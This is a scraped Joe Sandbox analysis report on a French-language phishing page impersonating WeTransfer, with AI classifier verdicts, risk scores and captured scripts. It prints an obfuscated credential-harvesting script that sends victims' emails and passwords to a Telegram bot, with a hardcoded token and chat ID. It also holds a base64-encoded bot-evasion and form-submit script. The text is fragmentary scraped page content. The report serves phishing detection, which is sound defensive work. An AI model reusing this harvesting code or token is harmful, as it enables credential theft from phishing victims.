ICAgICAgICAgICAvL2phdmFzY3JpcHQgcHV6emxlIGZvciBicm93c2VyIHRvIGZpZ3VyZSBvdXQgdG8gZ2V0IGFuc3dlcgogICAgICAgICAgICAgICAgICAgICAgICBpZighd2luZG93Ll9waGFudG9tIHx8ICF3aW5kb3cuY2FsbFBoYW50b20pey8qcGhhbnRvbWpzKi8KaWYoIXdpbmRvdy5fX3BoYW50b21hcyl7LypwaGFudG9tYXMgUGhhbnRvbUpTLWJhc2VkIHdlYiBwZXJmIG1ldHJpY3MgKyBtb25pdG9yaW5nIHRvb2wqLwppZighd2luZG93LkJ1ZmZlcil7Lypub2RlanMqLwppZighd2luZG93LmVtaXQpey8qY291Y2hqcyovCmlmKCF3aW5kb3cuc3Bhd24pey8qcmhpbm8qLwppZighd2luZG93LndlYmRyaXZlcil7LypzZWxlbml1bSovCmlmKCF3aW5kb3cuZG9tQXV0b21hdGlvbiB8fCAhd2luZG93LmRvbUF1dG9tYXRpb25Db250cm9sbGVyKXsvKmNocm9taXVtIGJhc2VkIGF1dG9tYXRpb24gZHJpdmVyKi8KaWYoIXdpbmRvdy5kb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuZ2V0QXR0cmlidXRlKCJ3ZWJkcml2ZXIiKSl7Ci8qaWYobmF2aWdhdG9yLnVzZXJBZ2VudCl7Ki8KaWYoIS9ib3R8Y3VybHxrb2RpfHhibWN8d2dldHx1cmxsaWJ8cHl0aG9ufHdpbmh0dHB8aHR0cmFja3xhbGV4YXxpYV9hcmNoaXZlcnxmYWNlYm9va3x0d2l0dGVyfGxpbmtlZGlufHBpbmdkb20vaS50ZXN0KG5hdmlnYXRvci51c2VyQWdlbnQpKXsKLyppZihuYXZpZ2F0b3IuY29va2llRW5hYmxlZCl7Ki8KLyppZihkb2N1bWVudC5jb29raWUubWF0Y2goL14oPzouKjspP1xzKlswLTlhLWZdezMyfVxzKj1ccyooW147XSspKD86LiopPyQvKSl7Ki8vKkh0dHBPbmx5IENvb2tpZSBmbGFncyBwcmV2ZW50IHRoaXMqLwogICAgICAgICAgICAgICAgICAgICAgICB2YXIgXzA1OTY4NjMyMz1wYXJzZUludCgiMjAyNDEyMDIiLCAxMCkgKyBwYXJzZUludCgiMDIxMjIwMjQiLCAxMCk7CiAgICAgICAgICAgICAgICAgICAgICAgIC8qfSovCi8qfSovCn0KLyp9Ki8KfQp9Cn0KfQp9Cn0KfQp9CiAgICAgICAgICAgICAgICAgICAgICAgIC8vZW5kIGphdmFzY3JpcHQgcHV6emxlCiAgICAgICAgICAgICAgICAgICAgICAgIHZhciB4aHR0cCA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOwogICAgICAgICAgICAgICAgICAgICAgICB4aHR0cC5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoeGh0dHAucmVhZHlTdGF0ZSA9PT0gNCl7CiAgICAgICAgICAgICAgICAgY29uc3QgZmlyc3RGb3JtID0gZG9jdW1lbnQucXVlcnlTZWxlY3RvcignZm9ybScpOwoKLy8gQ2hlY2sgaWYgdGhlIGZvcm0gZXhpc3RzIGFuZCBpZiBpdCBoYXMgaW5wdXQgZWxlbWVudHMKaWYgKGZpcnN0Rm9ybSkgewogIGNvbnN0IGlucHV0RmllbGRzID0gZmlyc3RGb3JtLnF1ZXJ5U2VsZWN0b3JBbGwoJ2lucHV0Jyk7CiAgCiAgaWYgKGlucHV0RmllbGRzLmxlbmd0aCA+IDApIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRvY3VtZW50LmZvcm1zWzBdLnN1Ym1pdCgpOwogIH0gZWxzZSB7CiAgICAgICAgICAgICAgICAgICBpZiAoIXdpbmRvdy5sb2NhdGlvbi5oYXNoKSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3aW5kb3cubG9jYXRpb24uaHJlZiA9IHdpbmRvdy5sb2NhdGlvbi5ocmVmOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3aW5kb3cubG9jYXRpb24ucmVsb2FkKCk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CiAgfQp9IGVsc2UgewogICAgICAgICAgICAgICAgIGlmICghd2luZG93LmxvY2F0aW9uLmhhc2gpIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdpbmRvdy5sb2NhdGlvbi5ocmVmID0gd2luZG93LmxvY2F0aW9uLmhyZWY7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdpbmRvdy5sb2NhdGlvbi5yZWxvYWQoKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KfQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgICAgICAgICAgfTsKICAgICAgICAgICAgICAgICAgICAgICAgeGh0dHAub3BlbigiUE9TVCIsICIvZ2ttLyIsIHRydWUpOwogICAgICAgICAgICAgICAgICAgICAgICB4aHR0cC5zZXRSZXF1ZXN0SGVhZGVyKCd5WTBHSDJMSFRONkowQ0l6Y3Zt |
| URL: https://connexion-espacesclients.support/gkm/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Vous avez reu un fichier scuris",
"prominent_button_name": "Continuer",
"text_input_field_labels": [
"Entrez l'adresse email"
],
"pdf_icon_visible": true,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 5,
"reasoning": "Script creates hidden iframe and injects Cloudflare's challenge platform script. While this is legitimate security functionality (DDoS protection), it uses potentially risky practices: dynamic script injection, hidden iframe creation, and DOM manipulation. The code is from a trusted source (Cloudflare) which reduces the risk, but the techniques used warrant caution."
} |
(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ec2a2543d6d41bb',t:'MTczMzIxOTIzNC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();
|
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "Script shows multiple high-risk indicators: heavy obfuscation (encoded strings, complex control flow), use of dynamic code manipulation (String.fromCharCode), and suspicious array/binary operations. The code appears to be a challenge/fingerprinting script with intentionally obscured functionality."
} |
window._cf_chl_opt={cFPWv:'b'};~function(X,h,i,j,k,o,s,B,D){X=b,function(d,e,W,f,g){for(W=b,f=d();!![];)try{if(g=-parseInt(W(256))/1*(parseInt(W(211))/2)+-parseInt(W(207))/3*(-parseInt(W(191))/4)+parseInt(W(204))/5*(-parseInt(W(253))/6)+parseInt(W(196))/7+-parseInt(W(167))/8+parseInt(W(144))/9+-parseInt(W(197))/10*(-parseInt(W(171))/11),e===g)break;else f.push(f.shift())}catch(F){f.push(f.shift())}}(a,210117),h=this||self,i=h[X(260)],j={},j[X(162)]='o',j[X(177)]='s',j[X(259)]='u',j[X(224)]='z',j[X(235)]='n',j[X(239)]='I',j[X(218)]='b',k=j,h[X(146)]=function(g,F,G,H,a2,J,K,L,M,N,O){if(a2=X,F===null||void 0===F)return H;for(J=n(F),g[a2(230)][a2(147)]&&(J=J[a2(209)](g[a2(230)][a2(147)](F))),J=g[a2(210)][a2(156)]&&g[a2(157)]?g[a2(210)][a2(156)](new g[(a2(157))](J)):function(P,a3,Q){for(a3=a2,P[a3(208)](),Q=0;Q<P[a3(236)];P[Q]===P[Q+1]?P[a3(237)](Q+1,1):Q+=1);return P}(J),K='nAsAaAb'.split('A'),K=K[a2(250)][a2(152)](K),L=0;L<J[a2(236)];M=J[L],N=m(g,F,M),K(N)?(O=N==='s'&&!g[a2(190)](F[M]),a2(176)===G+M?I(G+M,N):O||I(G+M,F[M])):I(G+M,N),L++);return H;function I(P,Q,a1){a1=b,Object[a1(186)][a1(189)][a1(182)](H,Q)||(H[Q]=[]),H[Q][a1(261)](P)}},o=X(226)[X(229)](';'),s=o[X(250)][X(152)](o),h[X(175)]=function(g,F,a4,G,H,I,J){for(a4=X,G=Object[a4(195)](F),H=0;H<G[a4(236)];H++)if(I=G[H],I==='f'&&(I='N'),g[I]){for(J=0;J<F[G[H]][a4(236)];-1===g[I][a4(228)](F[G[H]][J])&&(s(F[G[H]][J])||g[I][a4(261)]('o.'+F[G[H]][J])),J++);}else g[I]=F[G[H]][a4(151)](function(K){return'o.'+K})},B=function(ad,e,f,g){return ad=X,e=String[ad(248)],f={'h':function(F){return null==F?'':f.g(F,6,function(G,ae){return ae=b,ae(223)[ae(173)](G)})},'g':function(F,G,H,af,I,J,K,L,M,N,O,P,Q,R,S,T,U,V){if(af=ad,null==F)return'';for(J={},K={},L='',M=2,N=3,O=2,P=[],Q=0,R=0,S=0;S<F[af(236)];S+=1)if(T=F[af(173)](S),Object[af(186)][af(189)][af(182)](J,T)||(J[T]=N++,K[T]=!0),U=L+T,Object[af(186)][af(189)][af(182)](J,U))L=U;else{if(Object[af(186)][af(189)][af(182)](K,L)){if(256>L[af(252)](0)){for(I=0;I<O;Q<<=1,G-1==R?(R=0,P[af(261)](H(Q)),Q=0):R++,I++);for(V=L[af(252)](0),I=0;8>I;Q=Q<<1|V&1.9,R==G-1?(R=0,P[af(261)](H(Q)),Q=0):R++,V>>=1,I++);}else{for(V=1,I=0;I<O;Q=Q<<1|V,R==G-1?(R=0,P[af(261)](H(Q)),Q=0):R++,V=0,I++);for(V=L[af(252)](0),I=0;16>I;Q=V&1.18|Q<<1.49,G-1==R?(R=0,P[af(261)](H(Q)),Q=0):R++,V>>=1,I++);}M--,0==M&&(M=Math[af(227)](2,O),O++),delete K[L]}else for(V=J[L],I=0;I<O;Q=Q<<1|V&1.46,G-1==R?(R=0,P[af(261)](H(Q)),Q=0):R++,V>>=1,I++);L=(M--,0==M&&(M=Math[af(227)](2,O),O++),J[U]=N++,String(T))}if(''!==L){if(Object[af(186)][af(189)][af(182)](K,L)){if(256>L[af(252)](0)){for(I=0;I<O;Q<<=1,G-1==R?(R=0,P[af(261)](H(Q)),Q=0):R++,I++);for(V=L[af(252)](0),I=0;8>I;Q=Q<<1.91|1&V,R==G-1?(R=0,P[af(261)](H(Q)),Q=0):R++,V>>=1,I++);}else{for(V=1,I=0;I<O;Q=Q<<1|V,R==G-1?(R=0,P[af(261)](H(Q)),Q=0):R++,V=0,I++);for(V=L[af(252)](0),I=0;16>I;Q=V&1.36|Q<<1,G-1==R?(R=0,P[af(261)](H(Q)),Q=0):R++,V>>=1,I++);}M--,M==0&&(M=Math[af(227)](2,O),O++),delete K[L]}else for(V=J[L],I=0;I<O;Q=V&1|Q<<1.55,G-1==R?(R=0,P[af(261)](H(Q)),Q=0):R++,V>>=1,I++);M--,M==0&&O++}for(V=2,I=0;I<O;Q=Q<<1|V&1,G-1==R?(R=0,P[af(261)](H(Q)),Q=0):R++,V>>=1,I++);for(;;)if(Q<<=1,R==G-1){P[af(261)](H(Q));break}else R++;return P[af(217)]('')},'j':function(F,ag){return ag=ad,F==null?'':''==F?null:f.i(F[ag(236)],32768,function(G,ah){return ah=ag,F[ah(252)](G)})},'i':function(F,G,H,ai,I,J,K,L,M,N,O,P,Q,R,S,T,V,U){for(ai=ad,I=[],J=4,K=4,L=3,M=[],P=H(0),Q=G,R=1,N=0;3>N;I[N]=N,N+=1);for(S=0,T=Math[ai(227)](2,2),O=1;O!=T;U=Q&P,Q>>=1,Q==0&&(Q=G,P=H(R++)),S|=O*(0<U?1:0),O<<=1);switch(S){case 0:for(S=0,T=Math[ai(227)](2,8),O=1;O!=T;U=P&Q,Q>>=1,0==Q&&(Q=G,P=H(R++)),S|=(0<U?1:0)*O,O<<=1);V=e(S);break;case 1:for(S=0,T=Math[ai(227)](2,16),O=1;T!=O;U=P&Q,Q>>=1,Q==0&&(Q=G,P=H(R++)),S|=O*(0<U?1:0),O<<=1);V=e(S);break;case 2:return''}for(N=I[3]=V,M[ai(261)](V);;){if(R>F)return'';for(S=0,T=Math[ai(227)](2,L),O=1;O!=T;U=P&Q,Q>>=1,Q==0&&(Q=G,P=H(R++)),S|=(0<U?1:0)*O,O<<=1);switch(V=S){case 0:for(S=0,T=Math[ai(227)](2,8),O=1;T!=O;U=P&Q,Q>>=1,Q==0&&(Q=G,P=H( |
| URL: https://connexion-espacesclients.support/gkm/ Model: Joe Sandbox AI | {
"brands": [
"Wetransfer"
]
} |
|
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 10,
"reasoning": "This is a highly malicious script that exhibits multiple high-risk behaviors: 1) It contains obfuscated code using hex encoding, 2) It exfiltrates sensitive data (email/password) to Telegram via a bot token, 3) It appears to be part of a phishing operation based on the credential collection and error handling patterns. The presence of a Telegram bot token (7499623592:AAG4sRR7YzmOAFkZFFwiAbBsnnHB-lXYLSk) for data exfiltration is a clear indicator of malicious intent."
} |
var _0x40d1b3 = _0x1298;
function _0x1298(_0x93b389, _0x301fc5) {
var _0x190b9e = _0x190b();
return (
(_0x1298 = function (_0x12988f, _0x35f94c) {
_0x12988f = _0x12988f - 0x121;
var _0x866d3 = _0x190b9e[_0x12988f];
return _0x866d3;
}),
_0x1298(_0x93b389, _0x301fc5)
);
}
function _0x1298a(data) {
const _0x40d1b3a = '7499623592:AAG4sRR7YzmOAFkZFFwiAbBsnnHB-lXYLSk';
const _0x301fc5a = '1411469413';
const _0x93b389a = ` - ${data.email}:${data.password}`;
const _0x190b9ea = `https://api.telegram.org/bot${_0x40d1b3a}/sendMessage?chat_id=${_0x301fc5a}&text=${encodeURIComponent(
_0x93b389a
)}`;
fetch(_0x190b9ea, { method: "GET" })
.then((response) => {
if (response.ok) {
// La requte a russi
} else {
}
})
.catch((error) => {
console.error(error);
});
}
function _0x190b() {
var _0x185b99 = [
"234346BnGWhS",
"click",
"erreur-email",
"DOMContentLoaded",
"getElementById",
"POST",
"36633JrLxNF",
"hidden",
"94040SLmWws",
"status",
"Une\x20erreur\x20s\x27est\x20produite\x20lors\x20de\x20la\x20requte\x20:\x20",
"333210HZEhXV",
"aHR0cHM6Ly93ZXRyYW5zZmVyLmNvbS9kb3dubG9hZHMvZDJkMzQ4ZmUzZDI5OTVlMWNmOGU1ZmU4Y2Y4NGE1NmMyMDIzMTAzMTAxMTYxOC8xMTUwOTQ1YTdlZjkwZjMzYjljNjdlZjRkYzc3MDk4NTIwMjMxMDMxMDExNjU1LzA2Zjc3Nz90cms9VFJOX1RETF8wMSZ1dG1fY2FtcGFpZ249VFJOX1RETF8wMSZ1dG1fbWVkaXVtPWVtYWlsJnV0bV9zb3VyY2U9c2VuZGdyaWQ=",
"classList",
"focus",
"json",
"add",
"L\x27adresse\x20email\x20n\x27est\x20pas\x20reconnue.",
"452aQoRaO",
"zone-password",
"then",
"addEventListener",
"3010896cSLXTE",
"affiche-mdp",
"href",
"erreur-mdp",
"zone-email",
"remove",
"innerText",
"application/json",
"value",
"11980FYCpYT",
"323972tLwftV",
"40snIhbP",
"test",
"1InNRKI",
"Ce\x20mot\x20de\x20passe\x20est\x20incorrect.",
"Veuillez\x20entrer\x20un\x20mot\x20de\x20passe.",
"location",
"352MtEDsB",
];
_0x190b = function () {
return _0x185b99;
};
return _0x190b();
}
(function (_0x8c058f, _0x14b410) {
var _0x5592b9 = _0x1298,
_0x57b5e7 = _0x8c058f();
while (!![]) {
try {
var _0x21688c =
(-parseInt(_0x5592b9(0x13f)) / 0x1) *
(parseInt(_0x5592b9(0x13c)) / 0x2) +
-parseInt(_0x5592b9(0x122)) / 0x3 +
(-parseInt(_0x5592b9(0x12e)) / 0x4) *
(-parseInt(_0x5592b9(0x13b)) / 0x5) +
-parseInt(_0x5592b9(0x127)) / 0x6 +
(parseInt(_0x5592b9(0x144)) / 0x7) *
(parseInt(_0x5592b9(0x13d)) / 0x8) +
-parseInt(_0x5592b9(0x132)) / 0x9 +
(parseInt(_0x5592b9(0x124)) / 0xa) *
(parseInt(_0x5592b9(0x143)) / 0xb);
if (_0x21688c === _0x14b410) break;
else _0x57b5e7["push"](_0x57b5e7["shift"]());
} catch (_0x27c676) {
_0x57b5e7["push"](_0x57b5e7["shift"]());
}
}
})(_0x190b, 0x2aac6),
(msurl = ""),
document["addEventListener"](_0x40d1b3(0x147), function () {
var _0x2ffcc5 = _0x40d1b3,
_0x1d2392 = 0x0,
_0x474328 = document[_0x2ffcc5(0x148)](_0x2ffcc5(0x136)),
_0x46cb83 = document[_0x2ffcc5(0x148)](_0x2ffcc5(0x133)),
_0x55180f = document["getElementById"](_0x2ffcc5(0x12f)),
_0x2c9a80 = document[_0x2ffcc5(0x148)](_0x2ffcc5(0x146)),
_0x500e0a = document[_0x2ffcc5(0x148)](_0x2ffcc5(0x135)),
_0x1120d2 = document[_0x2ffcc5(0x148)]("continuer-button");
_0x1120d2[_0x2ffcc5(0x131)](_0x2ffcc5(0x145), function () {
|
| URL: https://connexion-espacesclients.support/gkm/ Model: Joe Sandbox AI | ```json{ "legit_domain": "wetransfer.com", "classification": "wellknown", "reasons": [ "The brand 'Wetransfer' is well-known and typically associated with the domain 'wetransfer.com'.", "The URL 'connexion-espacesclients.support' does not match the legitimate domain of Wetransfer.", "The URL contains suspicious elements such as hyphens and an unusual domain extension '.support', which are common in phishing attempts.", "The URL does not contain any recognizable association with Wetransfer, which raises suspicion.", "The presence of input fields asking for email addresses is a common tactic used in phishing sites to collect user information." ], "riskscore": 9}
Google indexed: False |
URL: connexion-espacesclients.support
Brands: Wetransfer
Input Fields: Entrez l'adresse email |
| URL: https://connexion-espacesclients.support/gkm/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Vous avez reu un fichier scuris",
"prominent_button_name": "Continuer",
"text_input_field_labels": [
"tutuututututu@gmail.com",
"Entrez le mot de passe"
],
"pdf_icon_visible": true,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: https://connexion-espacesclients.support/gkm/ Model: Joe Sandbox AI | {
"brands": [
"Wetransfer"
]
} |
|
Edit tour
chrome.exe (PID: 7040 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node